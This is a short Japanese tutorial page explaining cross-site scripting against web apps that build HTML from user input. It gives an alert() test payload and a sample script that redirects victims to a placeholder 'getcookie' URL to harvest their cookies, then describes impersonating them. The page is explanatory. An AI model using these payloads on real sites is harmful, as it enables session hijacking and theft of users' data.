クロスサイトスクリプティング |
スポンサードリンク
クロスサイトスクリプティングを利用して攻撃が行われるのは、ユーザーの入力に対して動的にHTMLページを生成するアプリケーションが対象になります。
以下にクロスサイトスクリプティング攻撃例を示します。
前提としてWEBアプリケーションの仕様が下図のようなユーザ入力から動的にHTMLを作成するものとします。
脆弱性があるWEBアプリケーションの場合、上記に"<script>alert('test')</script>"と入力するとアラートウィンドウがポップアップされてしまいます。つまりデータ入力チェックを行っていないため、スクリプトがそのまま実行されてしまうのです。この例ではアラートウィンドウのポップアップと影響はありませんが、悪意のあるユーザはスクリプトを利用しユーザ情報やcookie情報を盗み出します。
クロスサイトと呼ばれる所以は、サイト間を跨った攻撃を仕掛けるためです。まず攻撃者は脆弱性のあるサイトを見つけると、自分のサイトに以下に示すようなリンクを作成し、ユーザを脆弱性のあるサイトに誘導した後cookie情報を取得します。
<script>
location.replace("http://www.target-site.com/cgi-bin/getcookie?cookie=")
</script> |
その取得したcookieを使い正規ユーザになりすまして脆弱性サイトへアクセスし、不正行為を行います。
※WEBアプリケーション攻撃とはでもクロスサイトスクリプティングについて紹介しています。
|
|
|
|